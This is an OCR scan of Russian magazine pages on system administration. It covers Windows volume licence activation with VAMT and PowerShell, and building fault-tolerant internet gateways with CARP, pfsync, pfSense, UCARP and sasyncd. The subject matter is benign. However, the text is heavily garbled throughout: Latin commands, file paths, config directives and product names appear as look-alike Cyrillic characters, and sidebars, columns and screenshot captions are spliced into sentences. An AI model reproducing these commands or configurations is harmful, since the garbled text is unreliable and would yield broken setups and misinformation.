образом. Кроме того, есть реальная возможность получить в комплекте еще и малварь, преднастроенный 
антивирус при этом не будет замечать определенный процесс. Нужно ли все это тебе? 
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= \Уоште АсвуаНоп Мападетег Тоо! ах 


сана КОМПОНЕНТЫ 


С уоитедань Мытетентья 


4 [23 Родисв = 
Я Онсе а ны 
Я Упчомя Сотршег Мате^ РгодисЕ Мате РгодисЕ КеуТ... Ис Оувсоуег ргодисЕ... 


А РгодисЕ Кеуз 


А Аснме Онесоту-Вазе4 АсНуаНоп 


Треге аге ситепНу по ргодисё5 10 зпои/ т 15 мех. Цзе Не “ОЕбсоуег Ргодисё5" асноп оп те пар! прог [=... 
7] 08 Моште Исепятд Керой$ 
{5 левек РгодисЕ5 Верой 


АКег... 
{Я ририсаее СпегЕ Масвте 10 Вер4 э@есеЕ а зеагсй орйоп {о Япа сотрщег ава МАЛ 
{Я мывре Асёуабоп Кеу Узаде Ва ММпеп сопприйегз Пауе Бееп 'Чеп ед, уоц сап: я 
=] МЕ Аснуа!ед РгодисЕ Веро" . Урдаие Ве Исепзе зафиз оЁ опе ог ппоге звесЁе4 ргофисЁ Кейтезй степ мем #'... 
‚поза ргодисЕ Кеуз оп опе ог ппоге зЕесЁед ргодисЁ; 


Я уоште Асёманопз Бу Туре : Ехрап4 а! дгоир$ 
‚ Кемем герой Фог {Пе сотрщег 


Сойарзе в дтооря Графическая оболочка 

я а для О15М: 
а ьы 015таи!.содер!ех.сот В помощь администраторам М$ 
И предлагает специальный и, главное, 
ННег Ву сотриег пате Скачать АОК можно по бесплатный набор инструментов, 
| адресу: 900.9/ПРОЗК ПОЗВОЛЯЮЩИЙ настраивать, оце- 
нивать и развертывать ОС. Ранее 
Командлеты 01$М: он был известен как ММАК (\М/пао\м$ 
поздайавоя 1: Би. [у/КРи8 01 АщмщотаеЧч шзаНаНоп КК), с выхо- 
а дом \\т8/2012 его название измене- 
Си Список командлетов но на АОК (\/Ипаомз Аззеззтепе апа 
аа С МАМТ: БИ. 1у/17МТ 1 ОЮерюутепЕ КИ). Пакет разворачива- 
- ется на \\Мп7/8/2008/В2/2012. Уста- 
ВЫ Обзор активации корпо- новочную программу можно получить 
ративных лицензий: по адресу дчоо.а/пРОЗК. После запу- 
Подключаем клиентыв\УАМТ 6(.1у/1301002 ска загрузчик скачивает необходимые 


файлы и инициализирует собствен- 
но процесс установки на локальную 


продуктов с С\1К-ключами, срок активации заменена модулем (БИу/17мТЗй) Ромегзпей, систему. Если АОК будет ставиться 
которых истекает в течение 90 дней; предлагающим 12 командлетов. Перед использо- на несколько ПК, лучше использовать 
- Оирисае С!ет Маспте 10 Вероцм (отчет о ду- ванием необходимо его импортировать. автономную установку, выбрав в меню 
блирующихся СМ) — список хостов с дубли- вариант «Загрузить ...». В его состав 
рующимися ПР (его можно узнать, выполнив Р5> ТтрогЕ-Моди1е "С: \Ргоргат Е11е$ += входят: 
команду $1тгг /41\), это могут быть систе- (х86)\И1паом$ К1{$\8.9\Аззеззтепе «= . АррИсаНоп СотраНбЙНу Тоокй — 
мы, развернутые с одного образа, на которых апа ОБер]1оутепте К1{\ШОер1оутепЕ Тоо1$\+= определение приложений, со- 
не выполнен сброс О при помощи Зузргер; \УАМТ 3.@\\МАМТ.р$а1" вместимых с новыми версиями 
. МыЧре АсбуаНоп Кеу ЧУзаде Верой (отчет Р5> беф-Соттапа *-\атм** ММпаом/5; 
об использовании МАК) — список компьюте- . средства развертывания — на- 
ров в базе \АМТ с лицензией МАК; Например, чтобы добавить узел СОМРО1, но- стройка, автоматическое развер- 
. МотАсйузеа Ргодис({ Вероц (отчет о неактиви- вую лицензию и активировать, выполняем: тывание образов \\т4о\м$ и управ- 
рованных продуктах) — список компьютеров, ление ими. Сюда относится 0О!$М 
на которых не выполнена активация; Ръ5> Е1па-\амЕМапавеМасИ1те -ОчегуТуре ‹= (система обслуживания образов 
. \оите АсйуаНопз бу Туре (отчет о корпоратив- тапиа1 -Оцегу\/а1ие СОМРО1 -изегпате ‹= развертывания и управления, 
ной активации лицензий с разбивкой по цен- . \а@т1п15Егафог -раззмога раззмога Оерюутеп{ |паде Зегистда апа 
трам сертификации) — список продуктов Р5> АЧа-\МатЕРгодис*Кеу -ргодис*Кеу «<= Мападете"“), диспетчер установки 
с разбивкой по типам активации (МАК, КМ$ 12345-456789-12345 -АБбСоппес1оп+= УМ, ОСМО, ВСОВосф О!ЗМАРИ, 
и АБВА). 5{и1пр "афа зоугсе=.\аак; 1п1{1а1 «= ММАМСАР! и другие средства; 
сафа1о5={е5*;1пфергафе зесиг1Фу=+“ . \М/тпаомз РЕ — среда предвари- 
Чтобы просмотреть отчет, достаточно его вы- гие; ти1{1р1еас*1\уегези15е% = гие" тельной установки \/таом/$, содер- 
брать в окне, консоль подключится к БД и выдаст Р5> бе*-\УатЕРгодисе | Тп$%а11 -\Мате += жит ОС с ограниченным набором 
всю информацию, которую можно экспортиро- Ргоачс<АсЕ1уа 1оп функций, необходимых для запу- 
вать в С$\-файл. ска программы установки, исполь- 
Консоль \АМТ также позволяет управлять ЗАКЛЮЧЕНИЕ зования ОС на сетевом ресурсе, 
АОВА-активацией: добавлять КМ$ Ноз Кеу и ак- Несмотря на кажущуюся сложность, все показан- автоматизации основных процес- 
тивировать лес АБ для поддержки АОВВА. ные операции не требуют больших усилий, зато сов и проверки оборудования; 
В старых версиях была доступна утилита ко- впоследствии они существенно экономят время . ЧЪМТ (средство миграции поль- 
мандной строки уапт.ехе, которая в \АМТ 3.0 и позволяют избежать ошибок. = зовательской среды) — утилиты 


(Зсап«ме, Шоаа «ме, УЗМТИУШ5), 
позволяющие перенести пользо- 
вательские данные из прежней 
установки \\тпао\м$ в новую; 


ТИПЫ КЛЮЧЕЙ ДЛЯ КОРПОРАТИВНЫХ КЛИЕНТОВ Е о 


зий) — автоматизация и централи- 
зованное управление активацией 
В последних версиях продуктов Мсго5о{ корпоративные клиенты, кроме коробочной (Рща!) \ММпаом/5 и ряда дополнительных 
и ОЕМ лицензий, используют два типа ключей многократной установки: продуктов; 
‚ МАК (Мире Асй\апоп Кеу) — применяется, если окружение не имеет минимального коли- . набор средств для оценки произ- 
чества систем для использования службы КМ$ (менее 5 серверов и менее 25 компьютеров), водительности \\ пом — запись 
а также для активации отдельных систем, не имеющих выхода в интернет / службы КМ5. Каж- системных событий и анализ дан- 
дый ключ может активировать определенное число компьютеров. Клиент связывается с сер- ных о производительности; 
верами активации самостоятельно, или это производится централизованно (Ргоху Ас маНоп) . набор средств оценки \\Мпаом5. 
при помощи инструментов вроде \МАМТ. При этом пул активации ключа сокращается; Оценки — это задачи, имитирую- 
КМ$ — специальный ключ, который используется для локальной активации продуктов вну- щие пользовательскую активность 
три корпоративной сети с помощью службы КМ$ или АВВА, без индивидуального подключе- и проверяющие состояние ком- 
ния к серверам М$. Применяется, если компьютеров более 25. пьютера. На основе полученных 
оценок выдаются рекомендации 
по улучшению настроек. 


Зо $УМ/АСК 
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Поднимаем непотопляемый шлюз при помощи САВР/рр5упс 


Реалии современного бизнеса предъявляют жесткие требования к надежности шлюза, обе- 
спечивающего доступ в интернет. При использовании отказоустойчивой конфигурации с при- 
менением протокола САНР и механизма р?{5упс выход из строя интернет-шлюза не приведет к 
потере доступа к внешним ресурсам, более того, пользователь это абсолютно не заметит. 


ВВЕДЕНИЕ 

Чтобы не перенастраивать маршруты клиентов в случае выхода 
из строя основного шлюза, можно пойти двумя путями: пере- 
строить таблицы маршрутизации или отдать 1Р-адрес отказав- 
шего шлюза другому узлу. Каждый способ имеет свои плюсы 
и минусы. Протоколы динамической маршрутизации, вроде 
НР, ОЗРЕ ЕСЕНР или ВСР, требуют поддержки со стороны ро- 
утеров, плюс придется повозиться с настройками. Для простых 
сетей второй вариант реализовать на порядок проще, ктому же 
он имеет свои плюсы. 

Сетевой протокол дупликации общего адреса САВР (Соттоп 
Ааагез$ Ведипаапсу Рго{осо!) позволяет использовать один 1Р- 
адрес несколькими хостами, работающими в пределах одного 
сегмента сети и имеющими один виртуальный МАС (ШК 1ауег). 
Этот 1Р-адрес клиенты и устанавливают в маршруте по умол- 
чанию, поэтому изменять сетевые настройки в случае выхода 
из строя мастер-шлюза нет необходимости. Настроив СААР 
затем можно смело проводить обслуживание одного из узлов 
шлюзового кластера (изменять конфигурацию с перезагрузкой, 
обновлять ПО, проводить плановую модернизацию), не беспоко- 
ясь, что офис на какое-то время останется без интернета. 


ШМЕО 


Сагре Фет — латинское 
выражение, в данном 
случае означающее 
«Будь счастлив вту 
секунду, когда интернет- 
шлюз выйдет из строя» :). 


ОРЕМВЗО/РВЕЕВ$ЗО САВР 

Впервые САЕВР появился в 2003 году в ОС ОрепВ5 3.5 как от- 
вет на патентование компанией С!5со протоколов \УАВР (Мщиа! 
Вощег ВНедиупаапсу Ргоюсо!) и НЗВАР (Нот ЗЧапабу Вощег 
Ргофосо!). Впоследствии поддержка протокола была портирова- 
на в ЕгееВ $0, МевВ$о, ОгадопРуУу В$О и реализована для Ипих- 
систем. 

Работает САВР следующим образом. В случае выхода глав- 
ного узла из состава гедипааптсу дгочур (группа избыточности) 
его |Р и идентификатор подхватывает один из резервных узлов, 
имеющий более высокий приоритет. Для определения своей 
работоспособности главный узел использует объявления (!Р 
Ргхосо! 112, защищены при помощи ЗНА-1 НМАС), как только 
они прекращаются, делается вывод о сбое. Резервный узел, 
взяв на себя 1Р, начинает рассылать объявления. Выбирается 
такой узел просто: кто быстрее начнет рассылать объявления, 
тот и главный. Для этого в настройках каждого роутера ис- 
пользуются параметры ад\ба$е и ааузКем.. Интервал рассылки 
рассчитывается по формуле аа\убазе + а@\уз$Кем//255, то есть 
чем меньше значения, тем чаще узел рассылает объявления, 
а значит, вероятность того, что он станет мастером, выше. Когда 
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мастер-шлюз восстанавливает работоспособность, управле- 
ние снова переходит к нему (это необязательно, и в некоторых 
реализациях такое поведение можно отключить). 

Самое главное — при выходе из строя главного узла все 
существующие подключения сохраняются и работа клиентов 
продолжается как ни в чем не бывало. Хотя для некоторых при- 
ложений потребуется согласование настроек и, как результат, 
переподключение. Для устранения этих неудобств используют 
дополнительные механизмы, вроде р!эупс, синхронизирующие 
состояния соединений, рассылая сообщения (!Р рготосо! 240) 
на другие устройства, которые затем импортируют полученные 
таблицы. Данные, передаваемые р{!5упс, не шифруются, поэто- 
му для обмена таблицами соединений рекомендуется исполь- 
зовать выделенную физическую сеть. 

Обычно САЕНР используется для обеспечения отказоустой- 
чивости роутеров и брандмауэров, хотя в некоторых реализа- 
циях он позволяет распределять нагрузку посредством балан- 
сировки АВР (агрба!апсе). 

Конфигурирование САВР в ОрепВ5$Ь и ЕгееВЗО, по сути, ни- 
чем не отличается, только используются разные файлы. Теку- 
щие установки можно просмотреть при помощи команды 


# зузсЕ1 -а | вгер "пеф.1пеф.сагр" 
Разрешаем форвардинг и включаем САЕВР: 


# №1 /ефс/5зу$сЕ1. соп+ 
пе*.1пе*.1р.ФогиагЧ1п#=1 

# Разрешаем принимать САКР-пакеты 
пе{ф.1пеф.сагр.а11о0м=1 
пее.1пе{ .сагр .ргеетр*=1 
пеф.1пеф.сагр.105=2 


Активированный параметр пе. те .сагр.ргеетр{ позволит 
узлу участвовать в выборе мастера, при этом если откажет 
хотя бы один из САЯР-интерфейсов, то адузКем/ автоматически 
устанавливается в 240 и инициируются выборы мастер-шлюза. 
В случае если необходима балансировка, используем пет. тет. 
сагр.агрБа!апсе, указав режим балансировки: агр, р, р-ЗеайНй 
или р-ипса+. 

САВР-интерфейс создается на лету при помощи команды 
1+сопй8 сагр сгеафе. Для постоянных установок директивы 
прописываются в /е%с/гс. соп+ (ЕгееВЗО) или /ефс/Но$тпапе. * 
(ОрепВ$0). Помимо стандартных для сетевых интерфейсов па- 
раметров, необходимо указать пароль, установить группу ута 
и расставить приоритеты ад\узКе\м. 

Предположим, что имеется три сети: 192.168.0.0 (\МАМ), 
192.168.100.0 (ЕАМ) и 172.16.0.0 (между роутерами для р{эупс). 
Виртуальный ПР, создаваемый САВР, будет оканчиваться на 1. 
Нам требуется, чтобы на ММАМ и [АМ «висел» постоянный ПР, это 
позволит не менять настройки шлюза по умолчанию на компью- 
терах клиентов и подключаться к сервисам, расположенным 
внутри. Кстати, возможно использование уже имеющегося фи- 
зического адреса хоста в качестве виртуального адреса. 


Интерфейсы конфигурируются как обычно (это можно сде- 
лать во время установки ОС), разберем только то, что относится 
непосредственно к САВР и р!эупс. В ЕгееВЗБ: 


# №1 /ефс/гс.сопЕ 

пефмогк_1пфег+асез="1о0о0 ет@ ет1 ет2 рР5зупс@" 
с1опед_1п{егРасе$х=" сагр@ сагр1" 
1Рсопй5_сагро="уй1А 1 ра$$ ‹раз5мога> += 
192.168.0.1/24" 

1Рсопй5_сагр1="у!1А 2 ра$$ ‹раз5мога> += 
192.168.100.1/24" 

# Включаем р+5упс 

1Рсопй5 _рЕзупс@9="ир зупс1+ ет2" 


По окончании проверяем работу интерфейсов командой 
1+сопйэ сагр. 

Есть еще один момент, о котором стоит упомянуть. Все ин- 
терфейсы САНР разделены на группы (по умолчанию группа 
сагр, 1сопЯё -5), каждой можно назначать счетчик аетойоп 
соиЖег, позволяющий задавать некоторые ограничения: уста- 
навливать тафег при загрузке, ограничивать число отказо- 
устойчивых сагр. 

На резервном узле настройки полностью аналогичны, толь- 
ко в вызов Исопйа добавляем значение адузКе\ми. Покажу на при- 
мере ОрепВ5$Б: 


# №1 /ефс/по$%пате. сагр@ 
1пее 192.168.0.1 255.255.255.0 192.168.0.255 = 
УИ14 1 сагр4еу ет0 аду$Кем 100 ра$5 ‹ра$5мога> 


Параметр саграе\у можно не указывать, в этом случае СААР 
использует физический интерфейс, который соответствует 
той же подсети, что и назначенный [Р для виртуального интер- 
фейса. 

И второй: 


# №1 /ефс/по$%пате. сагр@ | 
1пеф 192.168.100.1 255.255.255.0 192.168.100.255 «+ 
\11Аа 2 саграеу ет1 ад\у$Кем 100 раз$ ‹раз5змога> 


Теперь настала очередь псевдоинтерфейса р?{эупс: 


# №1 /ефс/по$Епате .р+5упс@ 
ир °упс4еу ет2 


Такой вариант удобен в том случае, когда шлюзов несколь- 
ко, так как для передачи используется мультикаст. Как вариант, 
можно указать конкретный ГР: 
ир °упс4еу ет2 зупсреег 172.16.0.2 

На данный момент пакетный фильтр блокирует передачу 


служебной информации, необходимо добавить пару разреша- 
ющих правил в /ефс/р+. соп+: 


пеф. 1пеф . сагр. ргеемр{ =1 # 1=ЕпаБ]е сагр(4) ргеемр*1от 


пеф. 1пеф . сагр. 1949=3 # 109 1ече!1 оЁ сагр(4) 1трГо, 
1=ЕпаБ]1е р1рех(4) Гог пррра(8) 
В=По поф гор 1п$о0 а4Б оп а Кегпе! рапт1с 


Нпеф. р:рех. епаЪ 1е=1 
НЦАаЪ. рап1с=8 


737 


за 


Сергей Яремчук 
дппдег@5зупаск.ги 


АА А 


Сайт проекта УСАВР: 
игеИра.ога/ргоес+ 


усагр 


ПМЕРО 


САНР позволяет раз- 
делить нагрузку между 
узлами. 


УУАВММС 


В документации 
М!сгоз$ой можно 
встретить упоминание 
о протоколе САВР. Это 
одноименный протокол, 
который позволяет 
выдавать клиенту содер- 
жимое с определенного 
сайта. 


еГгац1+* 2 


На. сопзо 1е=1 

#Г$. розтх. зефици1а=8 

Ним. знарепскур{ . епаЪБ 1е=8 
НУГ$. пГ$. 10 Агеа4$ =4 
нпеф. 1пеф. 1р. ми41$с=8 
#Кеги. изегсгур{о=1 
нКегп. изегазумскгур о =1 
нкегт. зр 1а;з5ег{ =2 
#Кегпт. позц 14согейцмр =2 


1=Регм1* епфгу оГЁ ааБ Гхгом фВе сопз5о1е 
В=Тга&1{1опа1 ВП сНонтС) земат* 1с$ 

9=По поф епсгурф радез %Наф чо Фо знар 
МимБег оГ пЁГ510 Кегпе! фНнгеа4$ 

В=П15аЪ1е фср ми 41зсочегу 

1=ЕпаБ1е изег]апа цзе оЁ „дез/сгурто 
1=Регм1{ изег]ап@ фо 40 азуммефтг1с сгурфо 
2=ЕпаБ]1е м1! чегБозе еггог меззадче$ 

2=Риф зц1А согейимрз 1т Учаг/сгка$И 

>В=ЕпаБ1е Наг@анаге на%фсН4од (4) %1мехг 1Г ача11$ 
В=П1з5аБ]е ацфома*1с на%сН4од (4) гефг1ддег1тч 
9В=П1заБ]е роо! соггир{1оп снесКк$ (СГазфег) 


УтиаПР: 192.168.0.1 


192.168.0.2 
уНа1 ааузкеу 0 


192.168.0.3 
уНа1 ааузкеу 100 


нкеги. наф сИ4 од. рег104=32 
нкКегп. наф сИ4о4 . ац®фо=8 
#Ккеги. роо 1 _аеБич=8 


172.16.0.1 172.16.0.2 


Васкир # 395С{1 -а : дгер ‘пеф. 1теф. сагр` 
пеф. 1пеф .сагр.а110н=1 

пеф. 1пеф . сагр. ргеемр% =8В 

пеф. 1пеф. сагр. 1949=2 

# 395Ссф1 пеф. 1теф. сагр. ргеемр* =1 


= пеф. 1пеф . сагр. ргеемр* : В -> 1 
и 


Настраиваем параметры САВР 


Ритагу 


192.168.100.2 
уНа2 адузкеу 0 


192.168.100.3 
уНа2 адузкеу 100 


УщиаПР: 192.168.100.1 


Схемасети 


132 $УМ/АСК 
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› бучет › 1МеНасез >  Ргемиа > егмсез > УР >  аш5 › радпозс$ 


5егмсез: САКР 5етдз: ЕЯ 
ЕЕЕТИИЕ САПР енто 


Ртема!: Упфица! ТР АЧагез$: ЕЧИ © 


Е Уииа! ТР 


Ргоху АКР ® САВР ОПег ТР А!а5 


$11 бупофилнила ют 5е яку (рГуупе) 


бупебгопее бЕане5 


рёзупс тапзКагз зкаке пзегбоп, ирдаке, апд деебоп пеззадез БеЁ\иееп Йгемиа!. Еасн тема! зеп05 Зее опа ад@гезз 
116552065 ОЕ М9 ИКС оп 2 5ресйей птеЧосе, изпа сле РЕБУНС рготосо! (№? Рготосо! 240), 15 60 65епз оп 
{паг ига асе Гог оитйаг тесбадез Игопп обтег Игамуа, апд тропз {Пат по пе юса| Саке саБе. й 5“ 192.168.226.11 [24 [=] ТАБ тизЁ Бе те пениогк $ зибпеЕ тазк, 12 606$ поЁ рес а 
ТАБ зе зноиЮ Бе епагЫЧ оп 2 пепег$ оГ а Габомег дгоир. СОА гапде. 
Ц Сскпо аме млй Гогсе а сопйдигамоп зупс РК 6 епаБе4! (ее Сопйдигацюп зупопгогиганоп $710 
нему 
ПМЕО Егег {пе МНО дгоир раззигог4. 
5упелгопее леасе МАН  [ы] 
1 бупспгопие 5а(ез 6 епаБед, & у аи тие\асе Гог сопутипкавюп. ы 1 [| 
МОТЕ: М/е гесопитепа село спе со э исегасе озлег САзй ГАН! Л де@асеб исетасе многке спе Без, 
НОТЕ: Ус позе р а Роп ыы ПАЯ И п ШБ (аюуег дтоур. . Елщег {пе УНГ дгоир На е таснтез ми эваге 
НОТЕ: Уои плз Ваме ап ТР азздлед Но Не пееЧасе оп апу ра сраНпо зупс подез. 
С помощью протокола = - вое: ГЕ Эм: [07 
рГ5упс бупсйгопие Реег ПР ООО 
САВ р МОЖН 0 Н е тол Ь КО зехоло сле орбоп ий Рогсе рЁбупс го зупсигопае из се са го 6 1? 2007055. Те девиК 6 дгестод Те #'едиепсу аЁ {15 пасте О афуегсе. 0 теапз изиаЙу тазег. О{пегиизе {пе |оугеэЕ сотЫпабоп оЁ 

№ са5(. Бо машез п {пе сизкег дейегтитез {пе тазег. 

создавать отказоустой - 

у Утрата важ тосе К раем). 
чивые конфигурации Зупсиопые Сопйу © 

ЕПХег бе Р 200г655 Оле Игемиой со мкА спе э0естед сопйдиговоп зестопз эпоию ре зупсигопеед. (аме | 

6 ра НД М ауэ ро В ) Н 0 И га са МОТЕ: ХМЕВРС зупе 5 ситеп у опу зиррофед омег соппесвоп$ изто Бе зале ргоНосоГапЯ ро аз ВБ зузкет - 
таке зиге Пе гегпобе зузЕетт'$ рог ап ргогосо! аге зе ассогатов! Моте: 

Ргоху АВР ап О!пег Буре Миа! 1Р$ саппоЕ Бе Боип@ +о Бу апу тд гипппд оп йе Ягемга|, зисп а$ 1Р5ес, Ореп\РМ, еЁс. Цзе а САКР ог Р Айа5 
ранти ро вать непрерыв- МОТЕ: Оо по{ иъе Ше Зупспгопые СопЙ9 © ТР апЧ разъмгог4 орЦюп оп Бакир Чизбег петфегу! {уре ад@гесз Рог Несе сасез. 
Н ОСтЬ 0 бсл ужи ван и Я Каглоте бустаг усетапе [ ‘аатий Рог тоге иогтаноп оп САКР апд {йе аБоуе мае, м5 {пе ОрепВ5О САБР РАО. 
сетевых сервисов. Настройка САВР в интерфейсе р!5еп5е Устанавливаем виртуальный 1Р вр! 5еп5е 


# №1 /еЕс/р+. соп+ 
раз5 ач1ск оп { ет2 } ргофо рзупс Кеер $зЖафе (по-зупс) 
раз$ оп { ет0 ет1 } ргофо сагр Кеер $Фафе (по-зупс) 


Это минимум. При желании правила можно развивать, принудительно 
перенаправлять все запросы с физического интерфейса на САНР или доба- 
вить фильтры, разрешающие подключения по рЕупс и САНР только с опре- 
деленных |Р. 

Теперь можно проверять. Выключаем основной шлюз, |Р и МАС подхваты- 
вает резервный шлюз, при этом существующие соединения не обрываются. 
Хотя в случае активных \/РМ-туннелей есть свои особенности. 


СОХРАНЯЕМ СОСТОЯНИЕ1РЗЕСУРМ 
Соединения 1Рзес, одного из популярных протоколов, используемых 
для обеспечения \РМ, также можно «перекидывать» через САВР. Однако 
основная трудность заключается в том, что 1Р5ес оперирует механизма- 
ми 5есиге АззосаНоп$ (ЗА), определяющими, что нужно делать с пакетом 
(алгоритм шифрования, аутентификация, уникальный номер и прочее). 
В случае смены шлюза часть данных теряется, поэтому подключение об- 
рывается. Для сохранения состояния \РМ№-туннелей используется демон 
зазупса, также работающий в режиме ведущего или ведомого. Мастер 
отслеживает состояние локальных 1Р5ес ЗА и ЗРО и отправляет измене- 
ния (ТСР/500) на другие системы. Отказоустойчивость обеспечивается 
средствами САВР, передаваемая информация защищена при помощи 
АЕЗ и ЗНА. 

Конфигурацию 1Р$ес трогать не будем (демон должен стартовать с опцией 
-5), остановимся лишь на настройке собственно заупса. 


# №1 /ефс/зазупса. соп 
1п%егРасе сагр@о 
# Группа по умолчанию 
гоир саг 
115{еп оп 172.16.0.1 1пеЕ 
# ТР $|ауе роутера, можно указать несколько реег 
реег 172.16.0.2 


НАСТРОЙКА САВР В РЕЗЕМЗЕ 


# АЕ$-ключ 'ореп$$1 гапа -Вех 32' 
°ПагеКеу /ефс/зазупса.Кеу 


Устанавливаем корректные права доступа: 


# спомп гооф /ефс/зазупса. сой+ 


# ситоа 600 /ефс/зъазупса. соп+ 


Настройки на подчиненном шлюзе аналогичны, только в реег указываем 1Р- 
адрес основного шлюза (172.16.0.1). 

Перезапускаем 15актра и смотрим результат. Трафик между роутерами 
унас разрешен, поэтому обмен должен происходить без проблем. 


# рк111 15актра 
# 15ъактра -5$ -кК 
# зазупса 


Чтобы зазупса стартовал при загрузке системы, в конфиг /е{с/гс.сопф. 
]1оса1 добавляем запись: 


5азупса_Наё$= 


АЧТО ЖЕНЦМОХ? 

Для Ипих существует два варианта реализации САНР: в виде модуля ядра 
('огетар.перго]ест$5/сагр) и пользовательской программы УСАНР (ригейра. 
ога/огоесИисагр, 400.9/р4АБмл). Причем оба проекта не полностью совме- 
стимы со спецификацией СААР Первый работает только для ветки 2.4/2.6 
и давно не развивается, поэтому его можно встретить только на роутерах, 
использующих старые ядра. Второй совместим с Ипих 2.4+, О$ Х, ОрепВ$О, 
МиВ$УО и МеВЗО (ставить его в последних трех нет смысла). И хотя послед- 
ние изменения кода датированы 2010 годом, УСАВР работает в современных 
дистрибутивах и доступен в репозиториях. Единственный минус проекта — 
функция рЕзупс в ЧУСАЕР не реализована, поэтому все соединения при пере- 
ходе на другой роутер будут сброшены. Но стоит пользователям переподклю- 
читься, и они сразу получат доступ к требуемому ресурсу. 


Один из самых популярных дистрибутивов-ро- 
утеров на сегодняшний день — построенный 
на РгееВ$0 р!5епзе (р!5епзе.ога), поэтому со- 
всем нелишним будет разобрать, как настроить 
в нем САВР: 

Переходим в Еге\мма! —> Миа Р$ —> СААР 
зейтоа$ —> зупсИготе ЕпаЫеа и начинаем за- 
полнять поля. Активируем Зупсйгопме З{а{ез, 
выбираем нужный интерфейс в Зупсйпгопте 
|1еГасе. По умолчанию таблица синхронизи- 
руется при помощи мультикаста, но можно от- 
правлять по конкретному ПР, указав его в рЁ5упс 
Зупспгопйе Реег Р. Это, в принципе, достаточ- 
ный минимум. 


Разработчики рЕ5епзе пошли дальше, 
и срезервным роутером можно синхронизиро- 
вать все настройки сервера (учетные записи, 
сертификаты, правила, задания, установки 
сервисов и прочее). Для этого в Сопйдигайоп 
Зупспгопмайоп 5етоа$ (ХМЕВРС Фупс) следует 
указать логин и пароль админа второго роутера 
и отметить флажками данные для отправки. 

Теперь переходим во вкладку УШиа Р®, 
нажимаем + и конфигурируем виртуальный ГР. 
Выбираем в Туре -› САВР и далее заполняем 
все предложенные поля: 1Р-адрес, пароль, 
номер \/НГО и значения частоты синхронизации 
(Аа\уегизтоа Егедчепсу, на основном — 0). 


Включаем МАТ, переходим в Егема! —› МАТ -> 
ОшБоипа, выбираем Ащотанс ошроипа МАТ 
гие депегайоп и нажимаем $а\уе, это автомати- 
чески создаст правила для АМ, которые нужно 
отредактировать под !Р САВР. В Етема! —> Вцез 
добавляем правило, разрешающее подключе- 
ния для рРзупс-интерфейса (ада аЙо\м/ а! гот 
апу То апу). 

В ЗЧа$ —› САВР ТаНоуег показывается статус 
работы САНР, также здесь же можно быстро 
включить и выключить эту функцию, если 
требуется приостановить ее работу на какое-то 
время. В случае ошибки синхронизации ХМЕВРС 
бупс вверху страницы появится сообщение. 
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Итак, ставим ЧСАНР. В Убип\и и Оефап он уже есть в репозитории, поэтому соби- 
рать ничего не нужно: 


$ зидо ар*-веф 1п5%а11 исагр 


Реализация в виде изегзрасе имеет свои особенности, УСАНР, по сути, обычная 
программа, которую можно запустить любым способом, в том числе из стартовых 
скриптов. В официальном геаате (Чомитоа@а.ригейра.ога/риб/исагр/ВЕАОМЕ) пока- 
зан только общий для всех дистрибутивов принцип, помогающий понять, как построен 
ОСАВР Пользователям Убити/ОБеьап повезло больше, поскольку мантейнер положил 
в пакет все нужные скрипты и предоставил хорошее описание (/изг/зПаге/аос/исагр). 

Прописываем на мастер-сервере: 


$ зиао /ефс/пемогК/1пеегРасе$ 

1+асе ефи@ 1пеф $фаЕ1с 
аа4гез$5 192.168.0.2 
пефтазК 255.255.255.0 
исагр-у1а 1 
исагр-у1р 192.168.0.1 
исагр-раззмога раз$мога 
исагр-ад\у$Кем @ 
исагр-ад\Базе 1 
исагр-тазФег уе$ 

1Расе ефи9:исагр 1пеф $а*1с 
аа4ге$$5 192.168.0.1 
пефтазК 255.255.255.0 


Перезапускаем сеть: 


$ зиао /ефс/1п1*.А/пемогК1па гезфагЕ 


Второй интерфейс прописываем по аналогии, изменяем только 1Р-адрес и значение 
исагр-ма. 
Теперь резервный роутер: 


$ зидо /ефс/пеемогК/1пег+асе$ 

1+асе ефи@ 1пеф $фаЕ1с 
аа4ге$5 192.168.0.3 
пефтазК 255.255.255.0 
исагр-у1а 1 
исагр-у1р 192.168.0.1 
исагр-раззмога ра$$мога 
исагр-аду$Кем 100 

1Расе ефИи9:исагр 1пеф $а*1с 
аа4ге$$5 192.168.0.1 
пефтазК 255.255.255.0 


Все готово, можно использовать. 


ЗАКЛЮЧЕНИЕ 

В итоге у нас получилась несложная в реализации, но весьма эффективная систе- 
ма, позволяющая подстраховаться в том случае, когда шлюз или маршрут выходит 
из строя. Удачи в настройке. —= 


МОНИТОР ИНТЕРФЕЙСОВ 1ЕЗТАТЕО 


Демон Наеа(8) — еще одно интересное дополнение, которое может 
с успехом использоваться вместе с САВР Контролируя состояние 
интерфейсов и сервисов сети, он в ответ на изменившиеся условия 
выполняет определенные команды. Это может быть что угодно: при- 
нудительная смена мастера в САВР изменение таблицы маршрутиза- 
ции и правил р+, контроль доступности сервисов и так далее. При этом 
логику работы админ задает сам, это позволяет автоматизировать 
действия в ответ практически на любые внештатные ситуации. 

Для активации демона при загрузке следует добавить 
в /ефс/гс. соп+.1оса1 строку 1+5та{ед_Яа85="". Все настройки 
производятся в /ефс/1+$Та*еа . соп+, в справочной странице ИУаеч. 
сопкК5) можно найти несколько хороших примеров. После настроек 
желательно прогнать работу командой 1+5$+а+е4 -ам\, чтобы посмо- 
треть результат. 


ДЕЛА ВИНДОВЫЕ 


Использование \\Ип4ом$ в качестве маршрутизато- 
ра не такая плохая идея, как это кажется на первый 
взгляд. Тем более что этот вариант предусмотрен 
самими разработчиками. Достаточно вспомнить 
большое количество сервисов: УРМ, Опес\Ассез$, 
Ветое БезКор Зегмсе (АО$), да и собственно 
сервер маршрутизации и удаленного доступа 
\М/пао\м$ (РВА$), обеспечивающий подключение 
клиентов к интернету. Доступность любой из этих 
ролей потребует наличия второго сервера, а вот 
инструменты отказоустойчивости придется вы- 
бирать в зависимости от сервиса и версии ОС. 
Служба ВВАЗ и связанные с ней \РМ, а также ВО$ 
уже давно поддерживают балансировку сетевой 
нагрузки (МЕВ, Ме\могк 1оаа Ва!апста), и проблем 
с их использованием нет никаких. Но например, 
в ММп2К8В2 Опес1Ассе$$ ограничен развертыва- 
нием только на одном сервере, и, чтобы обеспе- 
чить резервирование, приходится задействовать 
отказоустойчивый кластер Нурег-\, настроенный 
для динамической миграции. В таком сценарии 
все равно функционирует только один сервер 
Онес{Ассе5$. В \ММт 2012 роль Оне{Ассе$$ со- 
вместно работает с ВВАЗ и, главное, поддерживает 
МЕВ, конфигурацию которой легко настроить прямо 
в мастере настройки роли. Также можно использо- 
